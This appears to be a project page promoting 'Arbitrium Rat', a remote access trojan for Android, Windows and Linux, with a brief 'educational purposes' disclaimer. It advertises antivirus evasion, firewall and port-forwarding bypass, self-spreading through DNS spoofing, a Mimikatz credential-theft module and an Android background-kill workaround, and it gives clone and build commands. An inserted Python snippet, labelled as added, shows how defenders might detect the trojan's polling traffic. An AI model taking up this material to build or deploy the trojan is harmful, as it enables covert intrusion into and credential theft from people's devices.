Arbitrium Rat: fully undetectable control of Android, Windows and Linux

Arbitrium Rat: this tool was made for educational purposes only. I urge anyone who would use this tool to only use it on targets he/she is authorized to access as a remote control tool. I hold no responsibility if one uses it for any unlawful activity.

Arbitrium Rat is a cross-platform remote access trojan (RAT) that is Fully UnDetectable (FUD). It allows you to control Android, Windows and Linux and doesn’t require any firewall exceptions or port forwarding. It gives access to the local networks: you can use the targets as an HTTP proxy, access the router, discover local IPs and scan their ports. It includes modules like Mimikatz, and new modules can easily be added. In addition, if Arbitrium is used with DNS spoofing software it can spread autonomously between devices (#AutoSpread). Arbitrium is a multi-part project; the parts were built using Java, JS, C, Python, Cordova and VueJS.

Features:

  •  FUD

The client uses simple tools, which makes it completely undetectable. The trojan is based mainly on netcat and pipes TCP packets to run the server’s commands.

  •  Firewall

Arbitrium Rat doesn’t require adding an exception to the firewall or a port forwarding rule. The server is an API with two kinds of endpoints: some receive tasks for a specific target, and others are requested periodically by the trojan to get new instructions. The instructions can be a JavaScript file (the Android app is made using Cordova) or a shell file to run in the terminal/CMD. Once the server receives a task for a device, it schedules the task, then opens a child process that waits for the trojan’s response by listening on a dedicated ephemeral port. Therefore, the trojan doesn’t need to listen on any port.

  •  Battery optimization / StealthMode

Unlike stock Android, customizations like MIUI by Xiaomi, EMUI by Huawei, or Samsung’s Android Pie ignore the permissions/exceptions given to an app by the user. So if you try to run an Android trojan in the background, the moment the app starts running frequent or heavy (in some cases even lightweight) tasks (e.g. sending HTTP requests periodically) it will be killed no matter what permissions the user grants; the OS completely ignores the current settings. dontkillmyapp.com is a known website dedicated to this particular issue.

The aforementioned issue was quite annoying while working on this project. After a while I found that building a lightweight binary that keeps running the assigned tasks in the background while the MainActivity stands still just after launching the binary appears to bypass most of the restrictions and actually even improve the performance of the app.

MainActivity receives a JS file from the server and uses ThreadPoolExecutor to start the binary without waiting for it to exit (more on this: StealthMode/BatteryBypass).

  •  Web interface

There is also a control panel. It is not a requirement but an extension: a simple VueJS webapp that provides a UI for controlling the targets instead of sending requests directly to the API. The webapp is available here: Arbitrium WebApp
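
The Firewall item above describes two network behaviours a defender can look for: the client polls the server's API at intervals, then connects out to a dedicated ephemeral port on the same server to return its output. The following is an added detection example, not code from the Arbitrium project; the flow-record format, thresholds, addresses and the 32768 ephemeral-port floor are all assumptions, and the flow data is constructed.

```python
from collections import defaultdict
from statistics import mean, pstdev

EPHEMERAL_MIN = 32768  # assumption: start of the Linux default ephemeral range
MIN_POLLS = 6          # assumption: polls needed before judging regularity
MAX_JITTER = 0.15      # assumption: max stdev/mean of the poll intervals
FOLLOW_WINDOW = 10     # assumption: seconds from a poll to the high-port connect

# Constructed flow records (not real traffic): (epoch_s, src, dst, dst_port)
FLOWS = (
    # 10.0.0.5: polls every ~30 s, then connects to high ports on the same server
    [(1000 + 30 * i + j, "10.0.0.5", "203.0.113.10", 80)
     for i, j in enumerate([0, 1, 0, -1, 0, 1, 0, 0])]
    + [(1062, "10.0.0.5", "203.0.113.10", 41873),
       (1152, "10.0.0.5", "203.0.113.10", 52044)]
    # 10.0.0.7: irregular browsing, no high ports
    + [(t, "10.0.0.7", "198.51.100.20", 443)
       for t in (1000, 1003, 1004, 1090, 1400, 1410, 1800, 1801)]
    # 10.0.0.9: regular polling (e.g. an update check) but no high-port connects
    + [(1000 + 60 * i, "10.0.0.9", "192.0.2.30", 443) for i in range(8)]
)

def find_poll_then_callback(flows):
    """Return (src, dst) pairs with regular polling followed by high-port connects."""
    polls, high = defaultdict(list), defaultdict(list)
    for ts, src, dst, port in sorted(flows):
        (high if port >= EPHEMERAL_MIN else polls)[(src, dst)].append(ts)
    findings = []
    for (src, dst), times in polls.items():
        if len(times) < MIN_POLLS:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0 or pstdev(gaps) / avg > MAX_JITTER:
            continue  # too irregular to look like a scheduled poll
        # High-port connections to the same server shortly after a poll
        followed = [h for h in high.get((src, dst), [])
                    if any(0 <= h - p <= FOLLOW_WINDOW for p in times)]
        if followed:
            findings.append({"src": src, "dst": dst,
                             "interval_s": round(avg, 1),
                             "callbacks": len(followed)})
    return findings

if __name__ == "__main__":
    for finding in find_poll_then_callback(FLOWS):
        print(finding)
```

Regular polling alone (10.0.0.9) is not flagged, because scheduled update checks look the same; the finding requires the follow-up connection to a high port on the same server.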

Requirements

  1. Android’s client
Java ver ...
Cordova
Android SDK & NDK
  2. Windows/Linux client
Python3.6 (or newer)
PyInquirer
Winrar (Windows only)

Build

⚠️ use setAPI_FQDN.sh first to set the server domain/IP in all files

Clone repo:

git clone https://github.com/BenChaliah/Arbitrium-RAT.git --recursive

  1. Android
$ cd ArbitriumClients/AndroidApp/ClientApp/
$ cordova build android
$ cd ../StealthMode/
$ make clean && make build
